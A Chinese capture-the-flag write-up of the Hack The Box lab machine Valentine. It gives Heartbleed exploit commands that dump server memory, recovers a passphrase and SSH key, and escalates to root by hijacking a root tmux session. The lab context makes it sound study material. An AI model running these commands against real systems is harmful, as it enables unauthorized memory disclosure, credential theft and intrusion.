zoukankan      html  css  js  c++  java
  • HTB-靶机-Valentine

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.79

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.79 -o ./Valentine-autorecon

    开放了3个端口,先访问443端口看看

    看图像是存在心脏出血漏洞,漏洞详情可以参考:https://zh.m.wikipedia.org/zh-hans/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E

    针对可以直接拿poc测试可以快速确认是否真的存在,也可以使用nmap的心脏漏洞扫描脚本进行扫描确认,我这里给出3个exploit,具体如下:

    心脏出血漏洞,通过在kali中搜索searchsploit heartbleed
    可获得可利用exploit 32745.py 和 32764.py 这两个exploit执行的结果一样,但是需要每次手动执行
    
    不停的执行如下命令:
    python 32745.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
    $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
    
    指定执行次数,不停地执行心脏出血漏洞,以发现重要敏感信息为准
    https://github.com/sensepost/heartbleed-poc/blob/master/heartbleed-poc.py
    执行如下命令:
    python heartbleed-poc.py 10.10.10.79 -n 150 -f heartdumbin.txt
    然后使用strings命令查询heartdumbin.txt 发现如下敏感信息
    $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
    
    上述解码后信息
    echo -n "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
    
    heartbleedbelievethehype

    得到base64编码的值然后解码即可,通过目录爆破发现如下目录信息

    访问dev目录

    得到上面信息,根据其中一个文件的提示,得知是需要先得到上面的解码信息,然后16进制密钥转换即可,这里提下上面访问的两个文件使用80或者443端口都可以正常访问,我这里就直接使用curl命令加-O参数下载此文件到本地kali然后使用xxd命令进行解码

    将其此文件重定向到id_rsa文件里面然后给600权限远程ssh登录到目标靶机

    登录目标靶机

    使用ps -ef命令查看当前进程

    发现已经有使用tmux命令开启的root进程会话,直接切换至此root会话即可提权

    tmux -S /.devs/dev_sess

  • 相关阅读:
    python爬取斗图网中的 “最新套图”和“最新表情”
    SpringBoot (1) idea下的环境搭建及demo
    python爬取视频网站m3u8视频,下载.ts后缀文件,合并成整视频
    微信小程序—day05
    从零起步做到Linux运维经理, 你必须管好的23个细节
    前后端分离原理
    图文并茂|为你揭开微服务架构的“神秘面纱”!
    swarm集群日常部分操作
    OpenStack 部署运维实战
    京东618:Docker扛大旗,弹性伸缩成重点 (2015-06-23)
  • 原文地址:https://www.cnblogs.com/autopwn/p/14086178.html
Copyright © 2011-2022 走看看